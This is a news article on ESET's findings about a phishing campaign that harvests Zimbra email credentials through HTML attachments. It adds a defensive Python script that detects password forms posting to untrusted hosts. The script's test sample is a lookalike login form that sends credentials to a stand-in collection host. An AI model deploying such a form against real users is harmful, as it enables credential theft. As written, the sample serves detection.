Cybersecurity researchers at ESET have exposed an ongoing mass-spreading phishing campaign that explicitly targets Zimbra Collaboration email server users. The campaign, which has been active since at least April 2023, aims to harvest the credentials of Zimbra account holders.
Writing in an advisory published earlier today, ESET said its telemetry suggested that the campaign has primarily targeted small and medium-sized enterprises (SMEs) and governmental entities, with a notable concentration of victims in Poland, followed by Ecuador and Italy.
The phishing campaign involves a multi-step process. Initially, targets receive an email containing an attached HTML file. The email typically masquerades as a server administrator, luring recipients into believing there is an urgent need for an email server update or that their account is at risk of deactivation. When the attached file is opened, victims are presented with a deceptive Zimbra login page that closely mimics the legitimate version, complete with pre-filled username fields.
Once victims input their login credentials, the malicious HTML form collects the information and sends it via HTTPS POST request to a server controlled by the attackers. What sets this campaign apart is its ability to propagate further: ESET has documented instances of subsequent waves of phishing emails sent from previously compromised Zimbra accounts. It appears that attackers gain access to administrator accounts and create new mailboxes to send phishing emails to other potential targets.
Although this phishing campaign relies on social engineering and user interaction, its wide distribution and success rate underscore the need for continued vigilance among Zimbra users, warned ESET malware researcher Viktor Šperka.
“Despite this campaign not being so technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, which remains an attractive target for adversaries,” Šperka wrote. “Adversaries leverage the fact that HTML attachments contain legitimate code, and the only telltale element is a link pointing to the malicious host.”
The security expert added that this approach makes it easier to bypass reputation-based anti-spam policies than phishing emails that place a malicious link directly in the message body, since the attachment itself is ordinary HTML and only the form's destination gives it away.
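The mechanism described above (an HTML attachment that is legitimate markup except for a credential form posting to an attacker-controlled host, with the username pre-filled) lends itself to a simple mail-gateway or triage check. The following is an added example written for this article, not ESET's code and not from the advisory: it parses an HTML attachment with the Python standard library and flags any form that asks for a password and posts to a host outside the organization's own mail server. The allowlist `TRUSTED_HOSTS`, the host names and the sample attachment are constructed for illustration.

```python
"""Triage an HTML e-mail attachment for credential-phishing forms.

Added example (not ESET's code or from the advisory). Heuristic: an HTML
attachment whose <form> contains a password field and posts to a host that
is not the organization's own mail server is flagged; a pre-filled username
field is reported as a second indicator. Hosts and sample HTML are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts a genuine login form for this organization may post to.
TRUSTED_HOSTS = {"mail.example.org"}


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method and the <input> fields it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str, "method": str, "inputs": [...]}
        self._current = None   # form currently being filled, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)        # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "type": (a.get("type") or "text").lower(),
                "name": a.get("name") or "",
                "value": a.get("value") or "",
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage_attachment(html, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        types = {i["type"] for i in form["inputs"]}
        if "password" not in types:
            continue  # only credential-collecting forms are of interest here
        host = (urlparse(form["action"]).hostname or "").lower()
        if host and host not in trusted_hosts:
            findings.append(
                f"credential form submits via {form['method'].upper()} to untrusted host {host!r}"
            )
        # A pre-filled username is the personalization trick the campaign relies on.
        prefilled = [i["name"] for i in form["inputs"]
                     if i["type"] in ("text", "email") and i["value"]]
        if prefilled:
            findings.append(f"username field pre-filled: {prefilled}")
    return findings


# Constructed sample attachment: a lookalike login page posting off-site.
SAMPLE_ATTACHMENT = """<html><body>
<form method="post" action="https://login-update.example.net/collect">
  <input type="text" name="username" value="jdoe@example.org">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form></body></html>"""

if __name__ == "__main__":
    for finding in triage_attachment(SAMPLE_ATTACHMENT):
        print("FLAG:", finding)
```

Run on the constructed sample it reports the off-site POST target and the pre-filled username; a form that posts to an allowlisted host, or that has no password field, produces no findings. In a gateway deployment the allowlist would be the organization's real Zimbra host names, and a non-empty result is a reason to quarantine the message rather than deliver it.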
“The popularity of Zimbra Collaboration among organizations expected to have lower IT budgets ensures that it stays an attractive target for adversaries.”
For organizations seeking to enhance their defense against this threat, a comprehensive list of indicators of compromise (IoC) can be found in the complete advisory, available here.